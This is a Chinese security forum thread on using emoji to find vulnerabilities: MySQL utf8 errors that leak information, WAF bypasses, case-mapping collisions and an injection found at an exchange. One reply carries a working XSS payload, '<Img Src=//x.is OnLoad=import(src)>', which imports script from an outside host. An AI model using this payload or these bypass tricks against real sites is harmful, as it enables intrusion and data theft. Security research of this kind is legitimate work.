导航

emoji对挖洞的辅助探讨

#1
背景:
     近期身边的站点都是微服务架构的,各种数据增删改查功能。逻辑简单,网关鉴权。想找个漏洞难度挺高的,经过测试,发现好像数据库解析emoji报错导致信息泄漏这个问题反而挺常见。

报错原理:
      mysql数据库的utf-8编码并不标准,只能存储占3个字节以内的字符。????在mysql中占了4个字节,插入或者查询的时候就会报错。utf8mb4编码解决了这个坑。

衍升
     我们知道emoji历史悠久,unicode编码也规定了它的二进制代码,但是没管怎么存储,所以各个平台、语言在存储方面都有自己的定义。导致不一致产生了,比如长度不一致,解析结果不一致等。我了解到在bypass、触发数据库报错、大小写映射冲突、emoji domain等方面可以辅助我们绕过waf或挖到更多问题,但是其他方面想看看各位大佬们还有没有什么思路。搜索了好几天资料,发现一些辅助资料,各位师傅可以看看。
https://mp.weixin.qq.com/s/mEwljigkkXk-y1ik7au_CQ
https://dev.to/hume/emojis-can-be-wicked-3phl
https://speakerdeck.com/mathiasbynens/hacking-with-unicode?slide=98
2022-03-02
#2
笑死,论坛就不支持mac的emoji的输入,hhhha
有志者、事竟成,破釜沉舟
<Img Src=//x.is OnLoad=import(src)>
2022-03-03
#3
之前在某交易所发现过emoji编码导致的注入 可惜注入点在用户名那里 长度限制死了
2022-03-03
#4
回复 3# dm-xy
我也补充一下,我使用这玩意发现很多微服务架构下的信息泄漏、还bypass遇到过几次
2022-03-07
#5
有碰见过中文就解析报错的
2022-03-16
#6
万物皆可bypass
2022-08-20
#7
经常碰到中文就报错信息的